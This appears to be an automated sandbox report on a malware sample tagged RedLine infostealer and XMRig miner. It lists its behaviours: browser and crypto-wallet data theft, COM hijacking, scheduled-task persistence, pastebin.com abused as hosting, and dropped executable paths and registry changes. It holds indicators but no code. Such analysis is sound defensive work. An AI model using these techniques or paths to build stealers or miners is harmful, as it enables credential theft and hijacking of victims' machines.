Malware Analysis Report

2025-03-15 04:56

Sample ID 240714-nhyvha1bnh
Target redirect
SHA256 6505e9b8af864023bb405d6e25d02e9853b128e1760dd87a64f920f697ac7db4
Tags
redline xmrig @mass1vexdd discovery execution infostealer miner persistence privilege_escalation spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6505e9b8af864023bb405d6e25d02e9853b128e1760dd87a64f920f697ac7db4

Threat Level: Known bad

The file redirect was found to be: Known bad.

Malicious Activity Summary

redline xmrig @mass1vexdd discovery execution infostealer miner persistence privilege_escalation spyware stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine

xmrig

RedLine payload

XMRig Miner payload

Downloads MZ/PE file

Reads user/profile data of web browsers

Event Triggered Execution: Component Object Model Hijacking

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Power Settings

Checks installed software on the system

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Views/modifies file attributes

Delays execution with timeout.exe

Checks SCSI registry key(s)

Suspicious behavior: GetForegroundWindowSpam

Enumerates processes with tasklist

Modifies data under HKEY_USERS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

NTFS ADS

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Opens file in notepad (likely ransom note)

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-14 11:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-14 11:24

Reported

2024-07-14 12:09

Platform

win11-20240709-en

Max time kernel

2699s

Max time network

2644s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\7z2407-x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\7z2407-x64.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO8C0CB02E\modest-menu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Desktop\modest8\modest-menu.exe N/A
N/A N/A C:\Users\Admin\Desktop\modest8\modest-menu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\Desktop\modest8\modest-menu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Desktop\modest8\modest-menu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Desktop\modest8\modest-menu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\ProgramData\Dllhost\winlogson.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\7-Zip\Lang\nn.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fur.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mn.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7z.sfx C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\gl.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sk.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ug.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\yo.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\de.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7z.exe C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mr.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nb.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ja.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ro.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sr-spc.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\zh-tw.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\descript.ion C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\et.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tk.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hi.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hu.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ta.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tg.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ps.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ru.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fi.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mng.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ne.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sa.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\cy.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\eo.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ms.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ro.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File created C:\Program Files\7-Zip\7-zip.dll.tmp C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\History.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ast.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\bg.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\lv.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ast.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ka.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\br.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\is.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pt.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\si.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\kk.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ko.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sw.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\es.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fa.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ne.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\be.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\readme.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7-zip.dll C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ku.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tg.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\io.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\vi.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7z.dll C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\de.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ext.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fy.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133654299032735122" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "10" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000e5f2b5a31fd2da01e641b68fe0d5da0156e110f0e1d5da0114000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3\0 = 5600310000000000ee58145c10006d6f646573743800400009000400efbeee58345bee58145c2e000000c3a90200000007000000000000000000000000000000dc34b9006d006f0064006500730074003800000016000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000e5f2b5a31fd2da01c0979cf822d2da01f12816eee1d5da0114000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3\0\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3\NodeSlot = "11" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
